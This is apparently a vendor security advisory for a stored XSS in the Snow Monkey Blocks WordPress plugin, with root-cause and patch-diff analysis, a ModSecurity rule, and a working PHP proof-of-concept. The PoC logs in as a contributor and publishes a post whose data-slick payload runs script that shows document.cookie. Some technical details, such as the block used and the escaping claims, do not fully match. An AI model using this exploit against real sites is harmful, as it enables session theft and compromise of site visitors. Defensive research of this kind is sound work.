Atomic Edge analysis of CVE-2026-3004:
This vulnerability is a Stored Cross-Site Scripting (XSS) found in the Snow Monkey Blocks plugin for WordPress, affecting versions up to and including 24.1.11. The issue lies in how the plugin processes the ‘data-slick’ attribute in slider blocks, allowing authenticated users with Contributor-level access or higher to inject arbitrary web scripts. The vulnerability carries a CVSS score of 6.4 (Medium severity).
Root Cause: The vulnerable code is the `_the_content_for_slider` method, located in `snow-monkey-blocks/snow-monkey-blocks.php` at lines 229-239 of the vulnerable version. This method hooks into `the_content` filter at priority 11. It uses a regex callback to repair `data-slick` attributes that have been malformed by WordPress’s `wptexturize` function. The regex `|data-slick=”{([^}]+?)}”|` matches the attribute content but performs no sanitization or validation on the matched value. The callback replaces double quotes with single quotes and `"` with double quotes, but does not escape or strip HTML/JavaScript, allowing an attacker to embed arbitrary script payloads within the attribute value.
Exploitation: An attacker with at least Contributor-level access can craft a post or page containing a Snow Monkey Blocks slider block with a malicious `data-slick` attribute. The attack vector is through the WordPress block editor, where the block’s `data-slick` attribute can be manipulated via the block’s JSON data. A payload such as `{“foo”:”bar\”>alert(1)”}` can be injected. When the post is saved and viewed by any user, the `_the_content_for_slider` filter processes the content and outputs the unescaped attribute, causing the script to execute in the victim’s browser.
Patch Analysis: The patch removes the entire `_the_content_for_slider` method and its associated `add_filter` call. In the vulnerable version (24.1.11), the filter was registered on line 45 with `add_filter( ‘the_content’, array( $this, ‘_the_content_for_slider’ ), 11 );`. The patched version (24.1.12) deletes lines 45 and 229-239 from the main plugin file. By removing this filter, the plugin no longer attempts to repair `data-slick` attributes on `the_content`, which prevents the injection vector because the malformed attribute data is not processed or output with unescaped content. The WordPress core `the_content` filter still applies standard escaping, mitigating the XSS.
Impact: Successful exploitation allows an authenticated attacker with Contributor-level privileges to inject arbitrary JavaScript into any page or post that uses a vulnerable slider block. This script executes in the context of any user who views the compromised page, potentially leading to session hijacking, credential theft, defacement, or redirection to malicious sites. The attack does not require elevated privileges beyond Contributor, making it a significant risk for sites with multiple authors.
Below is a differential between the unpatched vulnerable code and the patched update, for reference.
--- a/snow-monkey-blocks/dist/blocks/box/index.asset.php
+++ b/snow-monkey-blocks/dist/blocks/box/index.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('lodash', 'react-jsx-runtime', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-data', 'wp-element', 'wp-i18n', 'wp-keycodes', 'wp-primitives', 'wp-url'), 'version' => '36fd339945dbd8688238');
+<?php return array('dependencies' => array('lodash', 'react-jsx-runtime', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-data', 'wp-element', 'wp-i18n', 'wp-keycodes', 'wp-primitives', 'wp-url'), 'version' => 'e742c662480aaebdad12');
--- a/snow-monkey-blocks/dist/blocks/hero-header/index.asset.php
+++ b/snow-monkey-blocks/dist/blocks/hero-header/index.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('lodash', 'react-jsx-runtime', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-data', 'wp-element', 'wp-i18n', 'wp-primitives'), 'version' => '91978dca967bbc738a96');
+<?php return array('dependencies' => array('lodash', 'react-jsx-runtime', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-data', 'wp-element', 'wp-i18n', 'wp-primitives'), 'version' => 'a87ebcc4ec826cdc3f34');
--- a/snow-monkey-blocks/snow-monkey-blocks.php
+++ b/snow-monkey-blocks/snow-monkey-blocks.php
@@ -1,7 +1,7 @@
<?php
/**
* Plugin name: Snow Monkey Blocks
- * Version: 24.1.11
+ * Version: 24.1.12
* Description: Gutenberg blocks collection made by MonkeyWrench.
* Author: inc2734
* Author URI: https://2inc.org
@@ -42,7 +42,6 @@
add_filter( 'block_categories_all', array( $this, '_block_categories_all' ) );
add_action( 'init', array( $this, '_register_blocks' ) );
add_action( 'add_meta_boxes', array( $this, '_add_pr_meta_box' ) );
- add_filter( 'the_content', array( $this, '_the_content_for_slider' ), 11 );
}
/**
@@ -218,25 +217,6 @@
</p>
<?php
}
-
- /**
- * Because the data attribute is destroyed by the influence of wptexturize, it corrects it.
- *
- * @param string $content The post content.
- * @return string
- */
- public function _the_content_for_slider( $content ) {
- $content = preg_replace_callback(
- '|data-slick="{([^}]+?)}"|',
- function ( $matches ) {
- $matches[0] = str_replace( '"', ''', $matches[0] );
- $matches[0] = str_replace( '"', '"', $matches[0] );
- return $matches[0];
- },
- $content
- );
- return $content;
- }
}
require_once __DIR__ . '/vendor/autoload.php';
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-3004
# Target: Snow Monkey Blocks stored XSS via data-slick attribute
# This matches AJAX-based block editor requests containing malicious dataSlick payloads
SecRule REQUEST_URI "@contains /wp-json/wp/v2/posts"
"id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-3004 Snow Monkey Blocks XSS via dataSlick',severity:'CRITICAL',tag:'CVE-2026-3004',tag:'WordPress',tag:'XSS'"
SecRule REQUEST_METHOD "@streq POST" "chain"
SecRule ARGS:content "@rx <script[^>]*>.*data-slick" "t:none,t:urlDecodeUni"
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-3004 - Snow Monkey Blocks <= 24.1.11 - Authenticated (Contributor+) Stored XSS via 'data-slick' Attribute
// Configuration - Set these variables
$target_url = 'http://example.com'; // WordPress site URL
$username = 'contributor'; // WordPress username with Contributor role
$password = 'password'; // Password for the user
// Step 1: Authenticate and get cookies
$ch = curl_init($target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'log=' . urlencode($username) . '&pwd=' . urlencode($password) . '&wp-submit=Log+In');
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
$login_response = curl_exec($ch);
curl_close($ch);
// Step 2: Get WordPress nonce for post creation
$ch = curl_init($target_url . '/wp-admin/post-new.php?post_type=post');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
$new_post_page = curl_exec($ch);
curl_close($ch);
// Extract wp_rest nonce
preg_match('/"restNonce":"([^"]+)"/', $new_post_page, $matches);
$rest_nonce = $matches[1] ?? '';
// Extract API URL base
preg_match('/"root":"([^"]+)"/', $new_post_page, $matches);
$api_root = $matches[1] ?? $target_url . '/wp-json/';
// Step 3: Craft a post with malicious snow-monkey-blocks/box block containing XSS in data-slick
// The payload uses a broken data-slick attribute that will be processed by the vulnerable filter
$xss_payload = '{"foo":"bar\"><script>alert(document.cookie)</script>"}';
$block = [
'slug' => 'snow-monkey-blocks/box',
'attributes' => [
'dataSlick' => $xss_payload, // This will become data-slick attribute
'content' => 'Test'
]
];
$post_data = [
'title' => 'Atomic Edge XSS Test',
'content' => '<!-- wp:snow-monkey-blocks/box {"dataSlick":"' . $xss_payload . '" -->n<div class="smb-box" data-slick="' . $xss_payload . '">Test</div>n<!-- /wp:snow-monkey-blocks/box -->',
'status' => 'publish'
];
$ch = curl_init($api_root . 'wp/v2/posts');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($post_data));
curl_setopt($ch, CURLOPT_HTTPHEADER, [
'Content-Type: application/json',
'X-WP-Nonce: ' . $rest_nonce
]);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
$post_response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($http_code === 201) {
$post_data = json_decode($post_response, true);
echo '[+] Exploit successful! Post ID: ' . $post_data['id'] . PHP_EOL;
echo '[+] View the post: ' . $post_data['link'] . PHP_EOL;
echo '[+] The XSS payload will execute when the page loads.' . PHP_EOL;
} else {
echo '[-] Failed to create post. HTTP status: ' . $http_code . PHP_EOL;
echo '[-] Response: ' . $post_response . PHP_EOL;
}
// Clean up cookie file
unlink('/tmp/cookies.txt');
